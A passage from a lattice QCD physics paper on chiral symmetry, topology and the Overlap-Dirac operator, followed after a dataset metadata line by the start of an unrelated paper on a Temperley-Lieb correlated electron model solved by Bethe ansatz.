D(\mu)=\left(1-\mu \right) \left[ D(0) + {\mu\over 1-\mu}\right]\quad .
\label{eq:Dmu_0}
\end{equation}
We find it convenient to work in the chiral eigenbasis of $(\gamma_5 D(0))^2$
for massless fermions, $\mu = 0$. In this basis $D(\mu)$ takes on the following
block diagonal form~\cite{EHN}:
\begin{itemize}
\item There are $|Q|$ blocks of the form
$$\pmatrix{ \mu & 0 \cr 0 & 1 \cr}$$ associated with the global
topology of the configuration. These $|Q|$ blocks will be robust under
perturbations of the gauge field background. The two modes per block
have opposite chiralities. The chiralities of the modes with
eigenvalues $\mu$ will all be the same and dictated by the sign of the
global topology $Q$.
\item There are $2NV-|Q|$ blocks of the form
$$
\pmatrix{ (1-\mu) \lambda_i^2 + \mu & (1-\mu)\lambda_i\sqrt{1-\lambda_i^2} \cr
-(1-\mu)\lambda_i\sqrt{1-\lambda_i^2} & (1-\mu)\lambda_i^2 + \mu \cr } $$
with $0 \le \lambda_i \le 1$, $i=1,2,\cdots,2NV-|Q|$, depending on the
background gauge field. The $\lambda_i^2$'s are the eigenvalues of
$(\gamma_5D(0))^2$.
We leave open the possibility that $n_z^\prime$
of these eigenvalues could be exactly zero. These are accidental zeros
in that they would be lifted by a small perturbation of the gauge field
background. In each subspace, $\gamma_5 = \pmatrix { 1 & 0 \cr 0 & -1 \cr}$.
\end{itemize}
The matrix can be inverted in the above form to give the following block
diagonal form for the external propagator
${\tilde D}^{-1}(\mu)=(1-\mu)^{-1}\left[D^{-1}(\mu) -1\right]$:
\begin{itemize}
\item There are $|Q|$ blocks of the form
$$\pmatrix{ {1 \over \mu} & 0 \cr 0 & 0 \cr}$$
\item There are $2NV-|Q|$ blocks of the form
$${1\over \lambda_i^2(1-\mu^2) + \mu^2}
\pmatrix{ \mu(1-\lambda_i^2)
& - \lambda_i\sqrt{1-\lambda_i^2} \cr
\lambda_i\sqrt{1-\lambda_i^2} & \mu(1-\lambda_i^2)\cr } $$
\end{itemize}
We will use $\langle \cdots \rangle_A$ to denote the expectation value of
a fermionic observable in a fixed gauge field background, and $\langle \cdots
\rangle$ for the expectation value averaged over a gauge field ensemble.
From the above expression for the fermion propagator in a background
gauge field, we obtain
\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x)\gamma_5\psi(x) \rangle_A
= {1\over V} {\rm Tr}[\gamma_5{\tilde D}^{-1}]= {Q\over \mu V}
\label{eq:parity}
\end{equation}
in a gauge field background with
global topology $Q$. Here ${\rm Tr}$ denotes a trace over space, color and
Dirac indices.
$\langle \bar\psi \gamma_5 \psi \rangle$ goes to zero when averaged over
all gauge field configurations.
We also find
\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle_A
= {1\over V} {\rm Tr}[{\tilde D}^{-1}] =
{|Q|\over \mu V} +
{1\over V} \sum_i {2\mu(1-\lambda_i^2)\over
\lambda_i^2(1-\mu^2) + \mu^2} ~.
\label{eq:chiral}
\end{equation}
To discuss the gauge field average of $\langle \bar\psi \psi \rangle$
in the massless limit, we have to distinguish four cases
\footnote{ We do not consider the case of one flavor QCD since the chiral
symmetry is broken by the anomaly.}:
\begin{itemize}
\item We consider full QCD with $n_f > 1$ flavors in a fixed finite
volume. Gauge fields with non-zero topology are then suppressed by
$\mu^{n_f |Q|}$, the contribution from the zeromodes to $\det D(\mu)$.
Accidental zeromodes are also suppressed by the fermion determinant,
by $\mu^{2 n_f n_z^\prime}$.
Therefore, we find from eq.~(\ref{eq:chiral})
\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle = {\cal O}(\mu)
\end{equation}
and the chiral condensate vanishes in the massless limit in a finite volume.
\item We consider full QCD with $n_f > 1$ flavors in the infinite volume
limit, taking the volume to infinity before taking the mass to zero.
In this limit we expect $\langle |Q| \rangle$ to be proportional to
$\sqrt{V}$, and therefore the first term in (\ref{eq:chiral}) will go
to zero in the infinite volume limit.
The spectrum, $\lambda_i$, becomes continuous in the infinite
volume limit, represented by a spectral density, $\rho(\lambda)$. Then
we obtain,
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty}{1\over V}
\sum_x \langle \bar\psi(x)\psi(x) \rangle = \pi\rho(0)
\label{eq:cond}
\end{equation}
and the chiral condensate is proportional to the spectral density at zero
just as expected in the continuum~\cite{Banks}.
\item We consider a quenched theory in a fixed finite volume.
Now, gauge field configurations with nontrivial topology and accidental
zeromodes are not suppressed by a fermion determinant, and we obtain
\begin{equation}
\lim_{\mu\rightarrow 0}{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle
= \lim_{\mu\rightarrow 0} {\langle |Q|+2n_z^\prime \rangle \over \mu V}
\label{eq:chiral_massless}
\end{equation}
$2 n_z^\prime$ is the number of accidental, paired zero modes. Since they
are lifted by a small perturbation of the gauge fields, the gauge fields
for which such accidental zero modes exist are probably of measure zero,
and we expect $\langle n_z^\prime \rangle = 0$. Thus
in any finite volume $\langle \bar\psi \psi \rangle$ diverges like
${1\over \mu}$ in the quenched theory with a coefficient equal to
${\langle |Q| \rangle \over V}$. The expectation value here is over a
pure gauge ensemble, and the coefficient is therefore expected to be
proportional to $1/\sqrt{V}$.
\item We consider a quenched theory in the infinite volume limit, taking
the volume to infinity before taking the mass to zero. Then, the first
term in (\ref{eq:chiral}) vanishes and from the second we obtain
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty}{1\over V}
\sum_x \langle \bar\psi(x)\psi(x) \rangle = \pi\rho(0)
\label{eq:finite_rho0}
\end{equation}
where $\rho(0)$ is the spectral density at zero in a pure gauge ensemble.
\end{itemize}
A two flavor theory has a flavor SU(2)$_V \times$SU(2)$_A \cong $O(4)
symmetry. Consider the (real) O(4) vector made up of
\begin{equation}
\vec\phi = (\pi^a=
i\sum_{ij} \bar\psi_i(x)\gamma_5\tau^a_{ij}\psi_j(x) ,
~ f_0=\sum_i\bar\psi_i(x)\psi_i(x))
\end{equation}
where $f_0$ is also known as $\sigma$,
and the opposite parity (real) O(4) vector made up of
\begin{equation}
\vec{\tilde\phi} = (a_0^a= -\sum_{ij} \bar\psi_i(x)\tau^a_{ij}\psi_j(x) ,
~ \eta=i\sum_i\bar\psi_i(x)\gamma_5\psi_i(x)) ~.
\end{equation}
Here $\tau^a$, $a=1,2,3$, are the SU(2) generators. All eight
components are invariant under a global U(1) rotation associated with
fermion number. Under a vector SU(2) flavor rotation, the $\pi^a$
rotate among themselves, the $a_0^a$ rotate among themselves, and
$f_0$ and $\eta$ are left invariant. Under an axial SU(2) flavor
rotation, the $\pi^a$ mix with $f_0$ and the $a_0^a$ mix with $\eta$.
Finally, under a global U(1) axial rotation, $\vec\phi$ mixes with
$\vec{\tilde\phi}$.
Consider the space averaged pion propagator
\begin{equation}
\chi_\pi = \sum_{x,y} {1\over V} \langle \pi^a(x)\pi^a(y) \rangle =
{2\over V} \langle {\rm Tr}(\gamma_5\tilde D)^{-2} \rangle ~.
\label{eq:pion1}
\end{equation}
$(\gamma_5\tilde D)^{-2}$ is diagonal in the chiral basis.
There are $|Q|$ eigenvalues equal to ${1\over\mu^2}$ and $|Q|$ zero
eigenvalues from the global topology. The non-zero eigenvalues appear
in multiples of two and are equal to $(1-\lambda_i^2)/
\left( \lambda_i^2(1-\mu^2) + \mu^2 \right)$ which is nothing but
the diagonal entries of ${1\over\mu}{\tilde D}^{-1}$.
Relation (\ref{eq:Goldstone}) in section~\ref{sec:intro} therefore follows.
We also obtain
\begin{eqnarray}
{1\over V} {\rm Tr}(\gamma_5\tilde D)^{-2}
&=& {|Q|\over\mu^2 V} + {1\over V} \sum_i
{2(1-\lambda_i^2) \over \lambda_i^2(1-\mu^2) + \mu^2} \cr
&=& {1\over \mu} \langle \bar\psi \psi \rangle_A \quad .
\label{eq:susp2}
\end{eqnarray}
Therefore, we find the relation
\begin{equation}
\chi_\pi = \sum_{x,y} {1\over V} \langle \pi^a(x)\pi^a(y) \rangle =
{2\over\mu} \langle \bar\psi \psi \rangle.
\label{eq:pion2}
\end{equation}
We note that this relation holds for any volume and $\mu$, configuration
by configuration. In fact, from (\ref{eq:Goldstone}) it follows that
the relation holds for any chiral random source that might be used for
stochastic estimates of $\chi_\pi$ and $\langle \bar\psi \psi \rangle$.
Using, similarly,
\begin{equation}
{1\over V} {\rm Tr}({\tilde D}^{-2})
= {|Q|\over \mu^2V} + {1\over V} \sum_i
{2(1-\lambda_i^2) \left[ \mu^2(1-\lambda_i^2) -\lambda_i^2 \right]
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2}
\label{eq:susp1}
\end{equation}
we find for the space averaged $a_0$ propagator
\begin{equation}
\chi_{a_0} = \sum_{x,y} {1\over V} \langle a_0^a(x) a_0^a(y) \rangle =
- {2\over V} \langle {\rm Tr}\tilde D^{-2} \rangle =
2 \langle {d\over d\mu} \langle \bar\psi \psi \rangle_A \rangle ~.
\label{eq:a_0}
\end{equation}
For the space averaged $f_0$ propagator we find
\begin{equation}
\chi_{f_0} = \sum_{x,y} {1\over V} \langle f_0(x) f_0(y) \rangle =
{4\over V} \langle [{\rm Tr}{\tilde D}^{-1}]^2 \rangle -
{2\over V} \langle {\rm Tr}\tilde D^{-2} \rangle ~,
\label{eq:f_0}
\end{equation}
and for the space averaged $\eta$ propagator
\begin{equation}
\chi_\eta = \sum_{x,y} {1\over V} \langle \eta(x) \eta(y) \rangle =
{2\over V} \langle {\rm Tr}(\gamma_5\tilde D)^{-2} \rangle -
{4\over V} \langle [{\rm Tr}(\gamma_5\tilde D)^{-1}]^2 \rangle ~.
\label{eq:eta}
\end{equation}
To discuss these chiral susceptibilities, we again distinguish four cases:
\begin{itemize}
\item We consider full QCD in a finite volume and recall that gauge fields
with non-zero topology are suppressed by $\mu^{2 |Q|}$, while gauge fields
with accidental zeromodes are suppressed by $\mu^{4 n_z^\prime}$ from the
fermion determinant. Using eqs.~(\ref{eq:susp2}), (\ref{eq:susp1}) and
(\ref{eq:parity}) we find
\begin{equation}
\chi_\eta - \chi_{a_0} = {8 \over V} \Biggl\langle \sum_i
{\mu^2(1-\lambda_i^2)^2
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2} \Biggr\rangle
+{4 \langle |Q| \rangle\over \mu^2 V}
-{4 \langle Q^2 \rangle\over \mu^2 V} ~.
\label{eq:eta_a0}
\end{equation}
Taking the $\mu \to 0$ limit, the first term on the right hand side vanishes,
while for the others only the sectors with $Q = \pm 1$ contribute, for
which the two remaining terms cancel. Therefore we obtain
\begin{equation}
\lim_{\mu\rightarrow 0} \left( \chi_\eta - \chi_{a_0} \right) = 0 ~,
\end{equation}
and, as expected in a finite volume, the O(4) symmetry is unbroken in
the massless limit. On the other hand, consider
\begin{eqnarray}
\omega & = & \chi_\pi - \chi_{a_0} =
{2\over\mu} \langle \bar\psi \psi \rangle
- 2 \langle {d\over d\mu} \langle \bar\psi \psi \rangle_A \rangle\cr
& = &
{8 \over V} \Biggl\langle \sum_i
{\mu^2(1-\lambda_i^2)^2
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2} \Biggr\rangle
+{4 \langle |Q| \rangle \over \mu^2 V} \cr
& = & \chi_\eta - \chi_{a_0}
+ {4 \langle Q^2 \rangle \over \mu^2 V}
\quad .
\label{eq:omega}
\end{eqnarray}
We have used (\ref{eq:pion2}) and (\ref{eq:a_0}) in the first line,
(\ref{eq:susp2}) and (\ref{eq:susp1}) in the second line and
(\ref{eq:eta_a0}) in the last line.
Since $\chi_\eta - \chi_{a_0}$ vanishes in the massless limit, we
obtain
\begin{equation}
\lim_{\mu\rightarrow 0} \omega =
\lim_{\mu\rightarrow 0} {4 \langle Q^2 \rangle \over \mu^2 V}~.
\label{eq:anomaly}
\end{equation}
The U(1)$_A$ symmetry, therefore, remains broken in a finite volume, due
to topology. Only the sectors with $Q = \pm 1$ contribute in the massless
limit, giving a finite result. In fact, the four fermi operator
making up $\chi_\pi - \chi_{a_0}$ written explicitly in terms of left
and right handed spinors, is nothing but the
t'Hooft vertex.
\item We consider full QCD in the infinite volume limit, taking the volume
to infinity first. Then, one expects the O(4) symmetry to be broken down
to O(3)$\cong$SU(2), where the pions are the Goldstone bosons associated
with the spontaneous symmetry breaking. Eq.~(\ref{eq:pion2}) is consistent
with this expectation, implying that $m_\pi^2 \propto \mu$. The $\eta$,
on the other hand, is expected to remain massive due to the axial U(1)
anomaly. Therefore we find, using (\ref{eq:eta}), (\ref{eq:susp2})
and (\ref{eq:parity}),
\begin{eqnarray}
0 &=& \lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \mu \chi_\eta =
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} {\mu \over V}
\sum_{x,y} \langle \eta(x) \eta(y) \rangle \cr
&=& \lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \left\{
2 \langle \bar\psi \psi \rangle - {4 \langle Q^2 \rangle
\over \mu V} \right\}~,
\label{eq:etamass}
\end{eqnarray}
which leads to the relation
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} {2 \langle Q^2 \rangle
\over \mu V} =
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \langle \bar\psi
\psi \rangle ~,
\end{equation}
a relation that has been derived before in the continuum~\cite{Smilga}.
\item We consider a quenched theory in a fixed finite volume, assuming
two flavors of valence fermions. Now, gauge fields with non-zero
topology are not suppressed, and we obtain from (\ref{eq:eta_a0}) for
$\chi_\eta - \chi_{a_0}$ in the massless limit:
\begin{equation}
\lim_{\mu\rightarrow 0} \left( \chi_\eta - \chi_{a_0} \right) =
\lim_{\mu\rightarrow 0} {4\over \mu^2 V}
\langle |Q| + 2 n_z^\prime - Q^2 \rangle ~.
\end{equation}
Though we expect $\langle n_z^\prime \rangle = 0$ for the number of accidental
paired zero modes, we find not only that the O(4) symmetry remains broken
in the massless quenched theory in a finite volume, but that $\chi_\eta -
\chi_{a_0}$ diverges in the massless limit, unless we restrict the
quenched theory to the gauge field sector that has $|Q|=0,1$.
With this restriction, one can still see the global U(1) anomaly; however,
$\omega$ diverges as $4 \langle |Q| \rangle / (\mu^2 V)$
in the massless limit.
\item We consider a quenched theory in the infinite volume limit, taking
the volume to infinity before taking the mass to zero. From (\ref{eq:pion1})
and (\ref{eq:pion2}) it is clear that
\begin{equation}
\chi_\pi - \chi_\eta = \langle {4 Q^2 \over \mu^2 V} \rangle~.
\end{equation}
If we restrict ourselves to the topologically trivial sector $\pi$ and $\eta$
will be degenerate. If we allow all topological sectors, the right hand
side of the above equation will diverge in the massless limit and the
$\eta$ particle will not be well defined ($\chi_\eta$ will become negative).
\end{itemize}
\section{Numerical details}
\label{sec:details}
The main quantity that needs to be computed numerically is the fermion
propagator
$\tilde D^{-1}$. Certain properties of the Overlap-Dirac operator enable us
to compute the propagator for several fermion masses at one time using the
multiple Krylov space solver~\cite{Jegerlehner} and also go directly to the
massless limit. Our numerical procedure to compute the fermion bilinear
in (\ref{eq:chiral}) and $\omega$ in (\ref{eq:omega}) proceeds as follows.
\begin{itemize}
\item We note that
\begin{equation}
H_o^2(\mu) = D^\dagger(\mu) D(\mu) = D(\mu) D^\dagger(\mu) =
\left(1-\mu^2 \right) \left[ H_o^2(0) + {\mu^2\over 1-\mu^2} \right]
\label{eq:H_o_mu}
\end{equation}
with
\begin{equation}
H_o^2(0) = {1\over 2} + {1\over 4} \left[\gamma_5\epsilon(H_w) +
\epsilon(H_w)\gamma_5 \right]
\label{eq:H_o_0}
\end{equation}
\begin{itemize}
\item Eq.~(\ref{eq:H_o_mu}) implies that we can solve the set of equations
$H_o^2(\mu) \eta(\mu) = b$ for several masses, $\mu$, simultaneously
(for the same right hand $b$) using
the multiple Krylov space solver described in
Ref.~\cite{Jegerlehner}. We will refer to this as the outer conjugate
gradient inversion.
\item It is now easy to see that $[H_o^2(\mu),\gamma_5]=0$,
implying that one can work with the source $b$ and solutions
$\eta(\mu)$ restricted to one chiral sector.
\end{itemize}
\item The numerically expensive part of the Overlap-Dirac operator is the
action of $H_o^2(0)$ on a vector since it involves the action of
$[\gamma_5\epsilon(H_w) + \epsilon(H_w)\gamma_5]$ on a vector. If the
vector $b$ is chiral ({\it i.e.} $\gamma_5 b = \pm b$) then,
$[\gamma_5\epsilon(H_w) + \epsilon(H_w)\gamma_5] b = [\gamma_5 \pm 1]
\epsilon(H_w)b$. Therefore we only need to compute the action of
$\epsilon(H_w)$ on a single vector.
\item In order to compute the action of $\epsilon(H_w)$ on a vector one needs
a representation of the operator $\epsilon(H_w)$. For this purpose we use the
optimal rational approximation for $\epsilon(H_w)$ described in Ref.~\cite{EHN}.
As described in \cite{EHN}, the action of $\epsilon(H_w)$ in the optimal
rational approximation amounts to solving equations of the form
$(H_w^2 + q_k) \eta_k = b$
for several $k$ which again can be done efficiently using the multiple Krylov
solver~\cite{Jegerlehner}. We will refer to this as the inner
conjugate gradient inversion.
\item A further improvement can be made by projecting out a few low lying eigenvectors
of $H_w$ before the action of $\epsilon(H_w)$. The low lying eigenvectors can
be computed using the Ritz functional~\cite{Ritz}. This effectively reduces the
condition number of $H_w$ and speeds up the solution of $(H_w^2 + q_k) \eta_k = b$.
In addition the low lying subspace of $H_w$ is treated exactly in the action of
$\epsilon(H_w)$ thereby improving the approximation used for $\epsilon(H_w)$.
\item Since in practice it is the action of $H_o^2(\mu)$ on a vector
we need, we can check for the convergence of the complete operator at
each inner iteration of $\epsilon(H_w)$. This saves some small amount
of work at $\mu=0$ and more and more as $\mu$ increases, while at $\mu=1$
(corresponding to infinitely heavy fermions) no work at all is required.
\end{itemize}
We stochastically estimate ${\rm Tr}\tilde D^{-1}$,
${\rm Tr}(\gamma_5\tilde D)^{-2}$ and
${\rm Tr}\tilde D^{-2}$ in a fixed gauge field background.
To be able to do this efficiently, and in order to compute this at arbitrarily
small fermion masses, we first compute the low lying spectrum of
$\gamma_5 D(0)$ using the Ritz functional method~\cite{Ritz} . This gives us,
in particular, information about the number of zero modes and their
chirality.\footnote{The
topology and chirality information can also be obtained from the spectral
flow method of $H_w$~\cite{specflow}.}
In gauge fields with zero modes we always find
that all $|Q|$ zero modes have the same chirality. We have not found
any accidental zero mode pairs with opposite chiralities.
We then stochastically estimate the three traces above in the chiral sector
that does not have any zero modes. In this sector, the propagator with any
source is non-singular even for zero fermion mass. Given a Gaussian random
source $b$ with a definite chirality we solve the equation
$H_o(\mu)^2 \eta(\mu) = b$ for several values of $\mu$. Then we compute
$(1-\mu)\xi(\mu) = D^\dagger(\mu) \eta(\mu) - b$. The stochastic estimate of
${\rm Tr}\tilde D^{-1}$ is obtained by computing $b^\dagger \xi(\mu)$ and
averaging over several independent Gaussian chiral vectors $b$.
The stochastic estimate of ${\rm Tr}(\gamma_5\tilde D)^{-2}$
is similarly obtained by computing $\xi^\dagger(\mu)\xi(\mu)$ and
averaging over several independent Gaussian chiral vectors $b$.
To estimate ${\rm Tr}\tilde D^{-2}$ we also compute
$(1-\mu)\xi^\prime(\mu) = D(\mu) \eta(\mu) - b$. Then ${\rm Tr}\tilde D^{-2}$ is
stochastically obtained by computing ${\xi^\prime}^\dagger(\mu) \xi(\mu)$
and averaging over several independent Gaussian chiral vectors $b$.
Since the stochastic estimates were done in the chiral sector that does not
contain any zero modes, the result has to be doubled to account for the
contributions from the non-zero modes in both
chiral sectors. The contributions from the zero modes due to topology,
finally, are added on analytically from the appropriate
equations in section~\ref{sec:chiral_cond}.
Since modes with $\lambda_i^2=1$ do not contribute at
all to $\tilde D^{-1}$, we do not have to worry about double counting these
edge modes.
\section {Numerical results}
\label{sec:results}
For our numerical simulations, we used the usual hermitian
Wilson--Dirac operator $H(m)= \gamma_5 W_w(-m)$ with a negative
fermion mass term~\cite{Herbert1} at $m=1.65$. Our main results are
for quenched $SU(3)$ $\beta=5.85$, where we have three volumes, and
$\beta=5.7$, where we considered one. In Table~\ref{tab:params}, we
show the simulation parameters and number of configurations used.
From our previous work with the spectral flow of the hermitian
Wilson--Dirac operator~\cite{specflow}, we have higher statistics
estimates of $\langle |Q| \rangle$ and $\langle Q^2\rangle$ which we
quote in Table~\ref{tab:params} with $N_{\rm top}$ configurations
used. For our stochastic estimates of the various traces, we used
$N_{\rm conf}$ configurations and $5$ stochastic Gaussian random
sources. We found $5$ sources to be sufficient. For the plots of
$\langle\bar\psi \psi\rangle/\mu$ and $\omega$, we used $N_{\rm conf}$
configurations for the topology term with all statistical errors
computed using a jackknife procedure.
The fermion masses we used for our simulations range from $0$ to
$0.5$. We note that the number of (outer) conjugate gradient
iterations we require is typically about $50$, $90$, and $200$ with a
convergence accuracy of $10^{-6}$ (normalized by the source) for our
three volumes (in increasing order) at $\beta=5.85$. This is
consistent with our expectation that while we have chosen a chiral
source that has no overlap with the zero modes, the smallest non-zero
eigenvalues of $H_o^2(0)$ are decreasing with increasing volume. The
number of inner conjugate gradient iterations (used for the
application of $\epsilon(H_w)$ on a vector) is about 100, 105, and 150
with a convergence accuracy of $10^{-6}$ for our three volumes at
$\beta=5.85$. We projected out the 10, 10, and 20 lowest eigenvectors
of $H_w$ in the computation of $\epsilon(H_w)$, respectively, before
using the optimal rational approximation to compute $\epsilon(H_w)$ in
the orthogonal subspace. While costly, the pole
method~\cite{EHN,Herbert4} of implementing $\epsilon(H_w)$ is clearly
the most cost effective in terms of floating point operations compared
to other implementations of the Overlap--Dirac
operator~\cite{EHN,Borici},
We show our result for $\langle\bar\psi \psi\rangle$ without the topology
term included in Figure~\ref{fig:pbp_notop}. Shown (but not discernible) are
the results for all four volumes. An expanded view for small mass is shown in
Figure~\ref{fig:pbp_notop_expanded}. For small $\mu$, a linear dependence on
$\mu$ with zero intercept is expected from Eq.~(\ref{eq:chiral}).
If there is to be a chiral condensate in the infinite volume limit the
slope near $\mu=0$ should increase with volume. To see this effect
we show $\langle\bar\psi \psi\rangle/\mu$ for all our data sets in
Figure~\ref{fig:pbp_mu}.
For sufficiently small $\mu$, we see linearity in $\mu$ due
to finite volume effects. This linearity is manifested as a constancy in
$\langle\bar\psi \psi\rangle/\mu$. As the volume is increased, the
mass region where linearity sets in is shifted to smaller values.
However, the slope near $\mu=0$ does not increase proportional to the
volume and we conclude that there is no definite evidence for a
chiral condensate in the infinite volume limit yet.
We show $\langle\bar\psi \psi\rangle$ with the topology term included in
Figure~\ref{fig:pbp_withtop}. As expected from Eq.~(\ref{eq:chiral}),
the topology term diverges in a finite volume for $\mu\rightarrow
0$. However, the singularity is decreasing for increasing volume. For
sufficiently large volumes, we expect that the quenched $\langle|Q|\rangle$
scales like $\sqrt V$. From Table~\ref{tab:params}
we see that the increase of $\langle|Q|\rangle$ from
$8^3\times 16$ to $8\times 16^3$ is consistent with a $\sqrt V$ growth.
But this is not the case when we compare the value at
$6^3\times 12$ with the one at $8^3\times 16$. This is attributed
to a finite volume effect present at $6^3\times 12$~\cite{specflow}.
More insight into the possible onset of spontaneous chiral symmetry
breaking can be obtained by studying $\omega$ in
Eq.~(\ref{eq:omega}). If chiral symmetry is broken then $\omega$
should diverge as ${1\over\mu}$; otherwise, it should go to zero as
$\mu^2$. Evidence for chiral symmetry breaking in the infinite volume
limit should show up as a ${1\over\mu}$ behavior in $\omega$ at some
moderately small fermion masses ( an increase in the value of $\omega$
as one decreases the fermion mass) that turns over to a $\mu^2$
behavior at very small fermion masses. We show $\omega$ without the
topology term added in Figure~\ref{fig:omega_notop}.
We see a turnover developing in the $\beta=5.85$ data as the
volume is increased around $\mu \sim 10^{-2}$. The turnover is also
present in the data at $\beta=5.7$. Therefore it is possible that
there is an onset of chiral symmetry breaking, but the effect is not
strong enough for us to be able to extract a value for the chiral
condensate.
When we add the topology term in $\omega$, as shown in
Figure~\ref{fig:omega_withtop}, the turnover region is completely
obscured. This result demonstrates how finite volume effects relevant
for a study of chiral symmetry are
obscured by topology. To be able to extract the chiral condensate
in a quenched theory from finite volume studies it would therefore
be helpful to remove the contribution from topology. This is possible
with the Overlap-Dirac operator as demonstrated here.
\section {Conclusions}
\label{sec:conclusions}
We have derived the standard continuum relations among various
fermionic observables by working on a finite volume lattice with the
Overlap-Dirac operator. Our results are general and apply equally well
to the Overlap--Dirac operator of Neuberger~\cite{Herbert1} and
domain wall fermions for infinite extent in the extra fifth
dimension~\cite{Herbert3}. These relations do not reveal any new
physics but allow us to disentangle the contribution of topology and
simplify our numerical simulations. We should emphasize that the
relations follow only because Overlap fermions satisfy the usual
chiral symmetries at any lattice spacing, not only in the continuum
limit.
We have shown that the standard relation between the pion
susceptibility and the fermion bilinear (c.f.~(\ref{eq:pion2})) is
properly reproduced by our implementation of the Overlap-Dirac
operator even in the chiral limit. We found that for the volumes
studied the chiral condensate in the quenched approximation at small
fermion mass is dominated by the contribution from the global
topology. While this contribution eventually vanishes in the infinite
volume limit, it overpowers any signs for an onset of a non-vanishing
condensate for the volumes that we were able to study. Removing this
topological contribution, which is possible in our implementation of
the Overlap-Dirac operator, enabled us to perform a finite volume
analysis of chiral symmetry breaking. Still, our numerical simulations
for quenched $SU(3)$ gauge theory do not present strong evidence for a
chiral condensate in the infinite volume limit of the quenched theory;
however, there is some evidence for the onset of chiral symmetry breaking
as the volume is increased.
\acknowledgements
This research was supported by DOE contracts DE-FG05-85ER250000 and
DE-FG05-96ER40979. Computations were performed on the workstation
cluster, the CM-2 and the QCDSP at SCRI, and the Xolas computing
cluster at MIT's Laboratory for Computing Science.
We would like to thank H.~Neuberger for discussions.
| 2024-02-18T23:40:14.745Z | 1998-11-24T22:38:36.000Z | algebraic_stack_train_0000 | 1,799 | 5,728 |
|
proofpile-arXiv_065-8862 | \section{Introduction}
Integrable highly correlated electron systems have been attracting
increasing interest due to their potential applications in condensed matter
physics. The prototypical examples of such systems are the Hubbard and t-J
models as well as their supersymmetric generalizations \cite{um}.
Recently many other correlated electron models have been formulated
\cite{{dois},{doisa},{doisb},{doisc},{doisd},{tres},{tresa},{tresb}}.
Among these an interesting subclass corresponds to
models associated to the Temperley-Lieb (TL) algebras \cite{TLieb}.
For such models there exists a well established method to construct a
series of spin Hamiltonians as representations of the TL algebra and
of quantum groups, the R matrix associated with the XXZ chain being
the simplest example \cite{batch1}.
Later on, this approach was generalized by Zhang \cite{zhng} to
construct graded representations of the TL algebra using Lie
superalgebras and quantum supergroups. Along these lines a new
isotropic strongly correlated electron model was obtained \cite{quatro},
as well as its anisotropic version with periodic and closed boundary
conditions \cite{cinco}. In addition, it was shown in \cite{cinco}
that this last choice of boundary generates a quantum group invariant
model, in contrast to the traditional periodic one.
Models with quantum group invariance and closed boundary conditions
were first discussed by Martin \cite{martin} from representations
of the Hecke algebra. More recently, by means of a generalized
algebraic Bethe ansatz, Karowski and Zapletal \cite{KZ}
presented a class of quantum group invariant n-state vertex models
with closed boundary conditions.
Within the framework of the coordinate Bethe ansatz closed
spin chains invariant under $U_q(s\ell (2))$ were
investigated by Grosse et al. \cite{grosse}.
Also, an extension of the algebraic approach to the case of
graded vertex models \cite{skly} was analysed in \cite{foercb}
where a $U_q(sp\ell (2,1))$
invariant susy t-J model with closed boundary conditions was presented.
In this paper we obtain through the coordinate Bethe ansatz approach the
solution of the anisotropic, or q-deformed, electronic model proposed in
\cite{cinco}, for periodic and closed boundary conditions. Here,
the meaning of closed is that an operator, coupling the first
and last sites, is introduced into the expression of the Hamiltonian such
that we obtain a quantum algebra invariant closed system
(see \cite{seis} for more details).
In particular, for the closed case the Bethe ansatz
equations are derived by extending the systematic procedure
recently developed
in \cite{sete} to solve the quantum group invariant closed spin 1 chain
associated to the TL algebra for the case of a graded vertex model.
The paper is organized as follows. In section 2 we describe the correlated
electron system associated with the TL algebra. In section 3 we find
through the coordinate Bethe ansatz the
spectra of the model with usual periodic boundary conditions. In
section 4 the Bethe ansatz solution is presented for closed
boundary conditions. A summary of our main results is presented
in section 5.
\section{The Model}
The starting point for building the model is a 4-dimensional module V of the
Lie superalgebra $U_q(g\ell (2/1))$ utilized to obtain a representation of
the TL algebra. Let $\{|x \rangle \}^4_{x=1}$ be an orthonormal basis of
V
which carries the following parity,
\begin{equation}
[|1\rangle ]=[|4\rangle ]=0 \ \ \ \ \ [|2\rangle ]=[|3\rangle ]=1 .
\end{equation}
Everywhere we shall use the graded-tensor product law, defined by,
\[
(a\otimes b)(c\otimes d)=(-1)^{[b][c]} \ \ (ac\otimes bd)
\]
and also the rule,
\[
(|x\rangle \otimes |y\rangle )^{\dagger} ={(-1)^{[|x\rangle] [|y\rangle]
}}
\langle x|{\otimes} \langle y| .
\]
It is then possible to construct the following unnormalized vector of $V
\otimes V$
\begin{eqnarray}
\left| \Psi \right\rangle &=&q^{-1/2}\left| 4\right\rangle \otimes \left|
1\right\rangle +q^{1/2}\left| 1\right\rangle \otimes \left| 4\right\rangle
+q^{-1/2}\left| 3\right\rangle \otimes \left| 2\right\rangle -q^{1/2}\left|
2\right\rangle \otimes \left| 3\right\rangle \nonumber \\
\left\langle \Psi \right| &=&q^{-1/2}\left\langle 4\right| \otimes
\left\langle 1\right| +q^{1/2}\left\langle 1\right| \otimes \left\langle
4\right| +q^{-1/2}\left\langle 3\right| \otimes \left\langle 2\right|
-q^{1/2}\left\langle 2\right| \otimes \left\langle 3\right| \nonumber \\
&& \label{eq0.1}
\end{eqnarray}
Next, to arrive at a hermitian Hamiltonian we consider the operator
\[
T=\left| \Psi \right\rangle \left\langle \Psi \right|
\]
A straightforward calculation shows that
\begin{eqnarray}
T^2 = [2(q &+& q^{-1})]T \nonumber \\
(T\otimes I)(I\otimes T)(T\otimes I) &=& T\otimes I \\
(I\otimes T)(T\otimes I)(I\otimes T) &=& I\otimes T \ , \nonumber
\end{eqnarray}
such that $T$ provides a representation of the $TL$ algebra.
Following the approach of ref. \cite{batch1} to obtain solutions of
